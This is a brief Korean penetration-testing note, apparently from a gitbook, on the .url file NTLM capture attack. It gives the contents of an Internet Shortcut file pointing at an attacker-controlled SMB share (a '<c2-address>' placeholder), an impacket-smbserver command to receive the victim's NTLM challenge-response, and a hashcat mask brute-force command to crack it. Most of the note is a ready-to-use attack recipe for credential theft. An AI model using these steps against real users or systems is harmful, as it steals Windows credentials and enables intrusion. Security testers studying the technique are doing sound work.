url

url 확장 파일은 텍스트 메타파일로 외부 주소로 접근하는 목적으로 만들

이 확장자는 로컬에 미디어 데이터를 저장하지 않고 저장된 주소로 접속하여 재생하는 방식이기 때문에 공격자 smb 서버로 접속하는 명령도 정상적인 것으로 취급됩니다.

Windows 환경에서 원격 smb 서버에 접속하면 현재 세션으로 ntlm 인증을 수행하기 때문에 공격자는 수신된 챌린지 응답을 크랙할 수 있습니다.

# url 파일 생성
[InternetShortcut]
URL=\\'<c2-address>'\share

# smb 서버 실행
impacket-smbserver share . -smb2support

# 탈취한 ntlm 챌린지 응답 크랙
hashcat -m 5600 -w 4 -a 3 -1 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&' ?1?1?1?1?1?1?1?1?1?1?1?1 -i --increment-min=4 --increment-max=12 --potfile-path tmp.potfile

Reference

URL File Attack | Pentest Everythingviperone.gitbook.io

SMB Share – SCF File AttacksPenetration Testing Lab

Previoushta Nextwax

Last updated 2 months ago